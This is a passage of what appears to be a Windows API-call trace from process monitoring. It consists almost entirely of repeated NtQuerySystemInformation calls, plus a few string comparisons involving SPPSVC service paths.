(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0226.611] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0226.624] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x28, ResultLength=0x0) [0226.637] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x28, ResultLength=0x0) [0226.638] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x28, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0226.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, 